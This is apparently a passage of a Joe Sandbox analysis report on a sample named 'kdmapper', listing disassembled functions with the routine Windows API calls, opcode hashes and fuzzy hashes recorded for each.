Opcode ID: f35ef1e41f9188948294196a5cf675e31638cdbdc00a613f2f5c9f8c9778eeab
Instruction ID: 8f7411e30fe68f5777cafe041355990dd07286a94ea7518bee4e9818c02ff4b0
Opcode Fuzzy Hash: f35ef1e41f9188948294196a5cf675e31638cdbdc00a613f2f5c9f8c9778eeab
Instruction Fuzzy Hash: 9541A971945A789EDB20EBA0DC55AE9B3AAAF10304F0404EEE04A57183EB755FC5CF50

Function 006213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006213E1

Part of subcall function 00625E37: __EH_prolog.LIBCMT ref: 00625E3C

Part of subcall function 0062CE40: __EH_prolog.LIBCMT ref: 0062CE45

Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 19cce41e369fe3e162a6f53e709d07c20a30fc710842e86c551a07643b51002e
Instruction ID: 7bbf2b1a2fc0226184a9940d9282cb7e0e688f005c2118c263ceda44f9d5ffde
Opcode Fuzzy Hash: 19cce41e369fe3e162a6f53e709d07c20a30fc710842e86c551a07643b51002e
Instruction Fuzzy Hash: 92414CB0905B409EE764DF398885AE6FBE6BF29300F50492ED5FF87282C7316654CB54

Function 006213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006213E1

Part of subcall function 00625E37: __EH_prolog.LIBCMT ref: 00625E3C

Part of subcall function 0062CE40: __EH_prolog.LIBCMT ref: 0062CE45

Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a76f50f6bb6f40af15bf567cad55fb0b473afda30f9cb7d70156e27008a4dcfa
Instruction ID: cd244e9ebb64b1e083d6628b7a5cb7a76850bbe596a2530e84b79c42831c57fe
Opcode Fuzzy Hash: a76f50f6bb6f40af15bf567cad55fb0b473afda30f9cb7d70156e27008a4dcfa
Instruction Fuzzy Hash: C64169B0905B409EE724DF398885AE6FBE6BF29300F50492ED5FF87282CB312654CB54

Function 0063B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0063B098

Part of subcall function 006213DC: __EH_prolog.LIBCMT ref: 006213E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 35d8c8c13990cc99bb07d9fad5b6d6fad88ad0ea7e605145990797d6b9742022
Instruction ID: 22500723814d5e0d9987aa0bb98892cf07095b1540f683d7a053ed02269c3895
Opcode Fuzzy Hash: 35d8c8c13990cc99bb07d9fad5b6d6fad88ad0ea7e605145990797d6b9742022
Instruction Fuzzy Hash: F131CD71C04219DECF15DF64D951AEEBBB6AF09300F1044AEE409B7242D735AF04CBA5

Function 0064AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00653A34), ref: 0064ACF8

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: dd57bfea9f47f1b19bea26cae62bd7891625053c339d378bb03570ab883d5a37
Instruction ID: 03035385afe1462277ac8ec2221ec06dd140b8d77f22168e78cdefc48e9dbbcc
Opcode Fuzzy Hash: dd57bfea9f47f1b19bea26cae62bd7891625053c339d378bb03570ab883d5a37
Instruction Fuzzy Hash: 3711C433A802257FDF25DF98DC8099A7397AF84361B1A4220FD15AB394D631DD01C7D2

Function 00629215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0062921A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0d6b250403c31812659d00359d667ae1899fefd66a02b0cd85b87d29c8870403
Instruction ID: 6ef8ee0482d9f18126ad2fd6fccef627532ff64e8392d2089a15d7ecbb3b5982
Opcode Fuzzy Hash: 0d6b250403c31812659d00359d667ae1899fefd66a02b0cd85b87d29c8870403
Instruction Fuzzy Hash: CE018633911D34EBCF15ABA8DC419DEB733AFD9740F014129E812BB251DA34CE148AB4

Function 00643C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00643C3F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a15e3e54189fde8ba19ee39026ac2dd5c46068b764bb79393cb809bed74ab66c
Instruction ID: 1c5ba12ee7e0c2a4ccec4b4e217abaf950a39252b88eab3810f49076a905772e
Opcode Fuzzy Hash: a15e3e54189fde8ba19ee39026ac2dd5c46068b764bb79393cb809bed74ab66c
Instruction Fuzzy Hash: E5F0A0362002369F8F119EA8EC40ADA77ABEF11B617104124FA15E7390DB31EA20C7D0

Function 00648E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f23f388022b9cb186604784914cfacd3faad114163be56c2c9c0788fdce80acc
Instruction ID: 9b3721d228f22804fa4d47f95ec8adad459ba1869d5ea6dd5ff38e3a5eaedc04
Opcode Fuzzy Hash: f23f388022b9cb186604784914cfacd3faad114163be56c2c9c0788fdce80acc
Instruction Fuzzy Hash: 87E092312062266FEBB127759C05BDF7A4B9F81BB8F150125BC1997291DF21CD0182F5

Function 00625ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00625AC2

Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c9bbad0019177c8467de55e0680e4893bd682e7f35b495520e0976eb2e5ad205
Instruction ID: 5f5162c9fe60923071aac4d4590ecdd4477191387251b909fc844fde043dae4a
Opcode Fuzzy Hash: c9bbad0019177c8467de55e0680e4893bd682e7f35b495520e0976eb2e5ad205
Instruction Fuzzy Hash: E2018C30910690DAE725EBB8C4627DEFBA5DF69304F50848DA45663282CBB41B08DBA6

Function 0062A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0062A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6C4
Part of subcall function 0062A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6F2
Part of subcall function 0062A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: bbd8805b58b0684319cd28bd2410898a6766bcc5538828c5d386fb9342a9a5cf
Instruction ID: badf71e79f6969071669e9082b7e6cbd8707432ae7f5037c4b20219762160985
Opcode Fuzzy Hash: bbd8805b58b0684319cd28bd2410898a6766bcc5538828c5d386fb9342a9a5cf
Instruction Fuzzy Hash: EAF05431009BA0ABCB6257F459047C77B925F15361F048A4DF1F9521D6C3A550959F23

Function 00630E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00630E3D

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 5fb91c4beb53213e6e0cebdb255dc2806afc33718757948657ab7dcc89e3eb0f
Instruction ID: 887ceaa34e876d5356da64b02f558e126f7aa96c3fa3231d09c5202d29245dfc
Opcode Fuzzy Hash: 5fb91c4beb53213e6e0cebdb255dc2806afc33718757948657ab7dcc89e3eb0f
Instruction Fuzzy Hash: 60D0121170116556EF517728A8657FE290B8FC7351F0D0469F1465F393CE544886A2E5

Function 0063A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0063A62C

Part of subcall function 0063A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0063A3DA

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 7e307e9bff5ca53119817a5f650a9f78ea582141537da4dd5bdd77f5c67aa100
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 0CD0C77121420976DF426BA18D1396E7597EB01340F048125B8C2D5191EAB1DD10B5E6

Function 0063DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00631B3E), ref: 0063DD92

Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 4f0759327ae823478f17ee14162678cfa78d1f439a2b97cd9472ad6d6d0c4b6a
Instruction ID: 04d19d301537cf7301a6ed898b808c68999f2579cb2c70ea395b1d41665e06f9
Opcode Fuzzy Hash: 4f0759327ae823478f17ee14162678cfa78d1f439a2b97cd9472ad6d6d0c4b6a
Instruction Fuzzy Hash: 07D09E31144300BAD7012B51CD06F0B7AE3AB88F04F005658B384740B18AB29E21DB16

Function 0063E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0063E5E3

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 2415c36b66acde6806736935f436a4deea20af10506cb1d922b09be94b4045f4
Instruction ID: f57676e00c5dbf3205ed623f0dd52d8ee9d3b82bb7630131540a6183c3b28ca7
Opcode Fuzzy Hash: 2415c36b66acde6806736935f436a4deea20af10506cb1d922b09be94b4045f4
Instruction Fuzzy Hash: CED0A9B0080280ABC301EBA8D847784326BB322710FC02204B105891E1CB6B4182C7A9

Function 006298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,006297BE), ref: 006298C8

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9373c108e2731f63d9a8df9e3299add35feaa8d6cad0d338b87327cf4ae2fc46
Instruction ID: 017eee5f9031377115772ceab8a5cb4e2126d25361fc31e4d315d4eb7cd64978
Opcode Fuzzy Hash: 9373c108e2731f63d9a8df9e3299add35feaa8d6cad0d338b87327cf4ae2fc46
Instruction Fuzzy Hash: 45C01234400615858E248634A8440D57313AA937B6FB89B94C028852E1C326CC47EE21

Function 0063EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063EAF9

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58ca444cb110c77fa37d0b4505223790d950264be9b62d1266b77be9aa131de8
Instruction ID: 0fd44baf925268bfce31ffecbadd2a723389c7a91027fe98f77f14eaac2ab3d6
Opcode Fuzzy Hash: 58ca444cb110c77fa37d0b4505223790d950264be9b62d1266b77be9aa131de8
Instruction Fuzzy Hash: 2FB012C629A152BC350472001D02C37010FC0C0FA1B30812EF801C80C1DC820D0705B1

Function 0063E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ec2760fd349479c7cb576448f7dce138e98d924d1c97996d4bbd673e00c01479
Instruction ID: 324ea33ab9e54ee22d901cbf8a504fc7ce6d1118cf62c5a3b99e76cef47799b8
Opcode Fuzzy Hash: ec2760fd349479c7cb576448f7dce138e98d924d1c97996d4bbd673e00c01479
Instruction Fuzzy Hash: 9BB012E125C110FC3144A1041C02C37028FC0C0F21B30C12EFC05E11C0D8414D0A06B3

Function 0063E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a5cc2f0c0a799d992ccbdc2e8e353307736b10b23e353235a8fe83e123c02ac
Instruction ID: 5d66e31446f1f79e1b9d56cd77a489b482d38351b74912fcfb3cff3f52c3c062
Opcode Fuzzy Hash: 9a5cc2f0c0a799d992ccbdc2e8e353307736b10b23e353235a8fe83e123c02ac
Instruction Fuzzy Hash: 60B012F125C110FC3144A1041C02C37028FC0C0F25B30812EFC05D11C0D8454F0605B3

Function 0063E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c474613d497b8e0d0dd6170ff0824ca76cd4e172d2e406d27ff5ec094daa97ef
